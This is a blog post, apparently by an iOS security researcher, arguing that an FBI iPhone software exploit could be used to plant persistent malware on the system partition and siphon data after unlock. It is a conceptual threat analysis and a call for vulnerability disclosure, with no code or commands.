Why a Software Exploit Would be a Threat to Secure Enclave Devices

As speculation continues about the FBI’s new toy for hacking iPhones, the possibility of a software exploit continues to be a point of discussion. In my last post, I answered the question of whether such an exploit would work on Secure Enclave devices, but I didn’t fully explain the threat that persists regardless.

For sake of argument, let’s go with the theory that FBI’s tool is using a software exploit. The software exploit probably doesn’t (yet) attack the Secure Enclave, as Farook’s 5c didn’t have one. But this probably also doesn’t matter. Let’s assume for a moment that the exploit being used could be ported to work on a 64-bit processor. The 5c is 32-bit, so this assumes a lot. Some exploits can be ported, while others just won’t work on the 64-bit architecture. But let’s assume that either the work has already been done or will be done shortly to do this; a very plausible scenario.

Attacking the Secure Enclave is only necessary to access data at rest; in this case, the suspects are dead. However for the rest of those who may be targets of a nation state (journalists, executives, diplomats, security researchers, etc) this data becomes unlocked whenever the user enters their passcode. The entire user data partition is encrypted, however the operating system partition is not. In short, this means that such an exploit could be used to “jailbreak” a phone and install malware on the system partition without needing to brute force the passcode to access any data on the user partition. With temporary physical access to the device, such a payload could be delivered without the user’s knowledge – say, at a security checkpoint at an airport or during a momentary lapse of judgment at a bar. We know it also works on a completely locked device.

Once installed, malware like this could be written to wait for the user to unlock their phone and then siphon the data off of the user partition to a C2 server wirelessly. It wouldn’t matter if the user had a numeric pin or an alphanumeric passcode, because they’ve unlocked their data on a compromised phone. They’re completely unaware now that malware is stealing the data they’ve just allowed to be decrypted. This kind of surveillance is persistent and can go on monitoring the subject indefinitely, possibly even past a firmware update depending on a lot of factors (OTA, content of the update, etc.)

I wrote about techniques like this (and provided source code examples) in my last book a couple years ago, Hacking and Securing iOS Applications. It’s definitely a feasible attack, and one I’ve demonstrated before.

The moral of the story is that the exploit the FBI may have is dangerous in and of itself, regardless of whether it serves their specific purposes of brute forcing a device’s pin. Such an exploit has numerous uses within the intelligence community and poses a threat to not only the hundreds of millions of older devices out there, but if it can be ported to a 64-bit platform, every single one of us – either directly as a threat from the government, a nation state the exploit developer also sold it to, or another hacker who finds the same hole because FBI didn’t report the vulnerability to Apple. FBI has left us all potentially exposed by choosing to keep their technique secret.